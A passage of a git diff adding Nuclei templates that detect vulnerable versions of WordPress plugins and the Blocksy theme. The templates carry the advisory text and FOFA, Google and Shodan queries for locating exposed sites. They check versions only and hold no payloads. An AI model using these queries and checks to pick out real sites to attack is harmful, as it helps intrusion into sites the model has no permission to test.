+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "sg-helper"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '1.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11293.yaml b/poc/cve/CVE-2024-11293.yaml
new file mode 100644
index 0000000000..901d230530
--- /dev/null
+++ b/poc/cve/CVE-2024-11293.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11293
+
+info:
+  name: >
+    Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction Social Sites Login <= 1.7.9 - Authentication Bypass
+  author: topscoder
+  severity: critical
+  description: >
+    The  Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction Social Sites Login plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.7.9. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/466ff226-a47e-46f1-a46c-6260208ffd42?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.1
+    cve-id: CVE-2024-11293
+  metadata:
+    fofa-query: "wp-content/plugins/pie-register-social-site/"
+    google-query: inurl:"/wp-content/plugins/pie-register-social-site/"
+    shodan-query: 'vuln:CVE-2024-11293'
+  tags: cve,wordpress,wp-plugin,pie-register-social-site,critical
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/pie-register-social-site/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "pie-register-social-site"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.7.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11324-744eea132cf5114313c8cf238c08e606.yaml b/poc/cve/CVE-2024-11324-744eea132cf5114313c8cf238c08e606.yaml
new file mode 100644
index 0000000000..dd04d98a97
--- /dev/null
+++ b/poc/cve/CVE-2024-11324-744eea132cf5114313c8cf238c08e606.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11324-744eea132cf5114313c8cf238c08e606
+
+info:
+  name: >
+    Accounting for WooCommerce <= 1.6.6 - Reflected Cross-Site Scripting
+  author: topscoder
+  severity: medium
+  description: >
+    The Accounting for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f34b7518-5cb3-4b4e-8b18-927c08c045f7?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2024-11324
+  metadata:
+    fofa-query: "wp-content/plugins/accounting-for-woocommerce/"
+    google-query: inurl:"/wp-content/plugins/accounting-for-woocommerce/"
+    shodan-query: 'vuln:CVE-2024-11324'
+  tags: cve,wordpress,wp-plugin,accounting-for-woocommerce,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/accounting-for-woocommerce/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "accounting-for-woocommerce"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.6.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11341-d9c0a662afec84fc95603ed54f2aec86.yaml b/poc/cve/CVE-2024-11341-d9c0a662afec84fc95603ed54f2aec86.yaml
new file mode 100644
index 0000000000..355366c7b8
--- /dev/null
+++ b/poc/cve/CVE-2024-11341-d9c0a662afec84fc95603ed54f2aec86.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11341-d9c0a662afec84fc95603ed54f2aec86
+
+info:
+  name: >
+    Simple Redirection <= 1.5 - Cross-Site Request Forgery to Arbitrary Site Redirect
+  author: topscoder
+  severity: medium
+  description: >
+    The Simple Redirection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the settings_page() function. This makes it possible for unauthenticated attackers to update the plugin's settings and redirect all site visitors via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0fa84344-8672-43e1-a430-094021f7366f?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2024-11341
+  metadata:
+    fofa-query: "wp-content/plugins/eelv-redirection/"
+    google-query: inurl:"/wp-content/plugins/eelv-redirection/"
+    shodan-query: 'vuln:CVE-2024-11341'
+  tags: cve,wordpress,wp-plugin,eelv-redirection,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/eelv-redirection/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "eelv-redirection"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11420-2826e6328a5500d4faa1dc190ffc98cc.yaml b/poc/cve/CVE-2024-11420-2826e6328a5500d4faa1dc190ffc98cc.yaml
new file mode 100644
index 0000000000..53d1876808
--- /dev/null
+++ b/poc/cve/CVE-2024-11420-2826e6328a5500d4faa1dc190ffc98cc.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11420-2826e6328a5500d4faa1dc190ffc98cc
+
+info:
+  name: >
+    Blocksy <= 2.0.77 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    The Blocksy theme for WordPress is vulnerable to Stored Cross-Site Scripting via the Contact Info Block link parameter in all versions up to, and including, 2.0.77 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/02ad47d5-f011-4e0a-af29-088852d1e886?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-11420
+  metadata:
+    fofa-query: "wp-content/themes/blocksy/"
+    google-query: inurl:"/wp-content/themes/blocksy/"
+    shodan-query: 'vuln:CVE-2024-11420'
+  tags: cve,wordpress,wp-theme,blocksy,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/themes/blocksy/style.css"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Version: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Version: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "blocksy"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 2.0.77')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11429-f2942bb3824b4d9b7780f8fbd0f14593.yaml b/poc/cve/CVE-2024-11429-f2942bb3824b4d9b7780f8fbd0f14593.yaml
new file mode 100644
index 0000000000..f0201f417e
--- /dev/null
+++ b/poc/cve/CVE-2024-11429-f2942bb3824b4d9b7780f8fbd0f14593.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11429-f2942bb3824b4d9b7780f8fbd0f14593
+
+info:
+  name: >
+    Free Responsive Testimonials, Social Proof Reviews, and Customer Reviews – Stars Testimonials <= 3.3.3 - Authenticated (Contributor+) Local File Inclusion
+  author: topscoder
+  severity: low
+  description: >
+    The Free Responsive Testimonials, Social Proof Reviews, and Customer Reviews – Stars Testimonials plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'stars-testimonials-with-slider-and-masonry-grid' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/68250b6c-22c8-494f-b0b0-62b80cc4de0c?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2024-11429
+  metadata:
+    fofa-query: "wp-content/plugins/stars-testimonials-with-slider-and-masonry-grid/"
+    google-query: inurl:"/wp-content/plugins/stars-testimonials-with-slider-and-masonry-grid/"
+    shodan-query: 'vuln:CVE-2024-11429'
+  tags: cve,wordpress,wp-plugin,stars-testimonials-with-slider-and-masonry-grid,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/stars-testimonials-with-slider-and-masonry-grid/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "stars-testimonials-with-slider-and-masonry-grid"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.3.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11466.yaml b/poc/cve/CVE-2024-11466.yaml
new file mode 100644
index 0000000000..d5b39849c8
--- /dev/null
+++ b/poc/cve/CVE-2024-11466.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11466
+
+info:
+  name: >
+    Intro Tour Tutorial DeepPresentation <= 6.5.2 - Reflected Cross-Site Scripting
+  author: topscoder
+  severity: medium
+  description: >
+    The Intro Tour Tutorial DeepPresentation plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fe082a7-3d36-48b4-b81f-1e65e5ea430d?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2024-11466
+  metadata:
+    fofa-query: "wp-content/plugins/dp-intro-tours/"
+    google-query: inurl:"/wp-content/plugins/dp-intro-tours/"
+    shodan-query: 'vuln:CVE-2024-11466'
+  tags: cve,wordpress,wp-plugin,dp-intro-tours,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/dp-intro-tours/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "dp-intro-tours"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 6.5.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11643.yaml b/poc/cve/CVE-2024-11643.yaml
new file mode 100644
index 0000000000..eb76a50232
--- /dev/null
+++ b/poc/cve/CVE-2024-11643.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11643
+
+info:
+  name: >
+    Accessibility by AllAccessible <= 1.3.4 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Option Update
+  author: topscoder
+  severity: low
+  description: >
+    The Accessibility by AllAccessible plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'AllAccessible_save_settings' function in all versions up to, and including, 1.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/bb65d916-7d9e-4562-ab9b-c7ba012a08fb?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2024-11643
+  metadata:
+    fofa-query: "wp-content/plugins/allaccessible/"
+    google-query: inurl:"/wp-content/plugins/allaccessible/"
+    shodan-query: 'vuln:CVE-2024-11643'
+  tags: cve,wordpress,wp-plugin,allaccessible,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/allaccessible/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "allaccessible"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.3.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11747.yaml b/poc/cve/CVE-2024-11747.yaml
new file mode 100644
index 0000000000..b18a655762
--- /dev/null
+++ b/poc/cve/CVE-2024-11747.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11747
+
+info:
+  name: >
+    Responsive Videos <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    The Responsive Videos plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'somryv' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f723be00-79f1-4a24-8502-2c5844ccc5de?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-11747
+  metadata:
+    fofa-query: "wp-content/plugins/responsive-youtube-videos/"
+    google-query: inurl:"/wp-content/plugins/responsive-youtube-videos/"
+    shodan-query: 'vuln:CVE-2024-11747'
+  tags: cve,wordpress,wp-plugin,responsive-youtube-videos,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/responsive-youtube-videos/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "responsive-youtube-videos"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11769.yaml b/poc/cve/CVE-2024-11769.yaml
new file mode 100644
index 0000000000..9775c810c5
--- /dev/null
+++ b/poc/cve/CVE-2024-11769.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11769
+
+info:
+  name: >
+    Flower Delivery by Florist One <= 3.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    The Flower Delivery by Florist One plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'flower-delivery' shortcode in all versions up to, and including, 3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/93efae1f-1e4a-48ee-8a69-558c38925250?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-11769
+  metadata:
+    fofa-query: "wp-content/plugins/flower-delivery-by-florist-one/"
+    google-query: inurl:"/wp-content/plugins/flower-delivery-by-florist-one/"
+    shodan-query: 'vuln:CVE-2024-11769'
+  tags: cve,wordpress,wp-plugin,flower-delivery-by-florist-one,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/flower-delivery-by-florist-one/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "flower-delivery-by-florist-one"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11779-dc5a2e8f9e2fe37de6208069b0a261fc.yaml b/poc/cve/CVE-2024-11779-dc5a2e8f9e2fe37de6208069b0a261fc.yaml
new file mode 100644
index 0000000000..ee1b800c6e
--- /dev/null
+++ b/poc/cve/CVE-2024-11779-dc5a2e8f9e2fe37de6208069b0a261fc.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11779-dc5a2e8f9e2fe37de6208069b0a261fc
+
+info:
+  name: >
+    WIP WooCarousel Lite <= 1.1.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    The WIP WooCarousel Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wip_woocarousel_products_carousel' shortcode in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/50721265-dbbf-4032-a8d6-9cf42a986c0d?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-11779
+  metadata:
+    fofa-query: "wp-content/plugins/wip-woocarousel-lite/"
+    google-query: inurl:"/wp-content/plugins/wip-woocarousel-lite/"
+    shodan-query: 'vuln:CVE-2024-11779'
+  tags: cve,wordpress,wp-plugin,wip-woocarousel-lite,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wip-woocarousel-lite/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "wip-woocarousel-lite"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.1.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11807.yaml b/poc/cve/CVE-2024-11807.yaml
new file mode 100644
index 0000000000..8db1591885
--- /dev/null
+++ b/poc/cve/CVE-2024-11807.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11807
+
+info:
+  name: >
+    NPS computy <= 2.8.0 - Reflected Cross-Site Scripting
+  author: topscoder
+  severity: medium
+  description: >
+    The NPS computy plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'data1' and 'data2' parameters in all versions up to, and including, 2.8.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/fabeeba6-f3c0-4f9c-a12f-c97801aad810?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2024-11807
+  metadata:
+    fofa-query: "wp-content/plugins/nps-computy/"
+    google-query: inurl:"/wp-content/plugins/nps-computy/"
+    shodan-query: 'vuln:CVE-2024-11807'
+  tags: cve,wordpress,wp-plugin,nps-computy,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/nps-computy/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "nps-computy"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 2.8.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11813.yaml b/poc/cve/CVE-2024-11813.yaml
new file mode 100644
index 0000000000..6983b36169
--- /dev/null
+++ b/poc/cve/CVE-2024-11813.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11813
+
+info:
+  name: >
+    Pulsating Chat Button <= 1.3.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+  author: topscoder
+  severity: medium
+  description: >
+    The Pulsating Chat Button plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.6. This is due to missing or incorrect nonce validation on the amin_chat_button_settings_page() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/cea8295b-b4be-4a95-9137-ad2033a5169d?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2024-11813
+  metadata:
+    fofa-query: "wp-content/plugins/amin-chat-button/"
+    google-query: inurl:"/wp-content/plugins/amin-chat-button/"
+    shodan-query: 'vuln:CVE-2024-11813'
+  tags: cve,wordpress,wp-plugin,amin-chat-button,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/amin-chat-button/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "amin-chat-button"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.3.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11814.yaml b/poc/cve/CVE-2024-11814.yaml
new file mode 100644
index 0000000000..b47edd1069
--- /dev/null
+++ b/poc/cve/CVE-2024-11814.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11814
+
+info:
+  name: >
+    Additional Custom Order Status for WooCommerce <= 1.6.0 - Reflected Cross-Site Scripting
+  author: topscoder
+  severity: medium
+  description: >
+    The Additional Custom Order Status for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the wfwp_wcos_delete_finished, wfwp_wcos_delete_fallback_finished, wfwp_wcos_delete_fallback_orders_updated, and wfwp_wcos_delete_fallback_status parameters in all versions up to, and including, 1.6.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/28267144-a709-4631-8925-69c6e0aca77c?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2024-11814
+  metadata:
+    fofa-query: "wp-content/plugins/order-status-for-woocommerce/"
+    google-query: inurl:"/wp-content/plugins/order-status-for-woocommerce/"
+    shodan-query: 'vuln:CVE-2024-11814'
+  tags: cve,wordpress,wp-plugin,order-status-for-woocommerce,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/order-status-for-woocommerce/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "order-status-for-woocommerce"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.6.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11854.yaml b/poc/cve/CVE-2024-11854.yaml
new file mode 100644
index 0000000000..dc34aa28c6
--- /dev/null
+++ b/poc/cve/CVE-2024-11854.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11854
+
+info:
+  name: >
+    Listdom – Business Directory and Classified Ads Listings WordPress Plugin <= 3.7.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode Parameter
+  author: topscoder
+  severity: low
+  description: >
+    The Listdom – Business Directory and Classified Ads Listings WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘shortcode’ parameter in all versions up to, and including, 3.7.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/9ccb47c2-5f4b-45ea-9c48-0a9042a2fce6?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-11854
+  metadata:
+    fofa-query: "wp-content/plugins/listdom/"
+    google-query: inurl:"/wp-content/plugins/listdom/"
+    shodan-query: 'vuln:CVE-2024-11854'
+  tags: cve,wordpress,wp-plugin,listdom,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/listdom/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
